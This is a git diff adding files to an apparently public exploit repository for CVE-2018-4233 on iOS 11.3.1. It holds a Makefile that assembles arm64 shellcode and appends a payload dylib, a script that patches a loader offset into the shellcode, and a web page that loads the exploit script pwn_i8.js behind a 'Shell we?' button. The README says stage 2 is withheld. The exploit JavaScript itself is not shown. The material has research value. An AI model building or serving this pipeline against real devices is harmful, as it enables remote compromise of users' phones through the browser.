CVE-2018-4233 exploit

exploits/ios-11.3.1/.gitignore

@@ -0,0 +1,3 @@
+/shellcode.s
+*.bin
+*.i64

exploits/ios-11.3.1/LICENSE

@@ -0,0 +1,26 @@
+Copyright (c) 2018, Niklas Baumstark
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+The views and conclusions contained in the software and documentation are those
+of the authors and should not be interpreted as representing official policies,
+either expressed or implied, of the FreeBSD Project.

exploits/ios-11.3.1/Makefile

@@ -0,0 +1,16 @@
+.PHONY: payload/payload.dylib
+
+shellcode.bin: shellcode.s payload/payload.dylib Makefile
+	#aarch64-linux-gnu-as -EL -o shellcode.o shellcode.s
+	#aarch64-linux-gnu-objcopy -O binary shellcode.o shellcode.bin
+	as -arch arm64 shellcode.s -o shellcode.o
+	gobjcopy -Obinary shellcode.o shellcode.bin
+	rm shellcode.o
+	dd if=/dev/zero of=shellcode.bin bs=1 count=1 seek=4095
+	cat payload/payload.dylib >> shellcode.bin
+
+shellcode.s: shellcode.in.s payload/payload.dylib Makefile
+	python2 gen_shellcode.py
+
+payload/payload.dylib:
+	cd payload && make

exploits/ios-11.3.1/README.md

@@ -0,0 +1,9 @@
+# !!! NOT USEFUL FOR END USERS !!!
+
+THIS IS ONLY INTERESTING FOR DEVELOPERS, EXPECT NO SUPPORT IN ANY SHAPE OR FORM!
+
+See pwn_i8.js for details.
+
+I have no plans to work on this more. Stage 2 is closed source for now so people don't write malware, but I'm willing to provide sources to legitimate developers who want to build something awesome with it.
+
+Works best when no other apps are running in the background and phone is left alone for a while before clicking on the final alert. Watch console for stage 2 progress.

exploits/ios-11.3.1/gen_shellcode.py

@@ -0,0 +1,8 @@
+from subprocess import check_output
+
+loader_offset = int(check_output('nm -g payload/payload.dylib | grep "T _load"',
+        shell=True).split()[0], 16)
+inp = open('shellcode.in.s').read()
+outp = inp.replace('OFFSET_LOAD', hex(loader_offset))
+with open('shellcode.s', 'w') as f:
+    f.write(outp)

exploits/ios-11.3.1/index.html

@@ -0,0 +1,2 @@
+<script src="pwn_i8.js"></script>
+<button onclick="go()" style="font-size: 2cm; margin: 2cm;">Shell we?</button>

exploits/ios-11.3.1/payload/Makefile

@@ -0,0 +1 @@
+payload.dylib: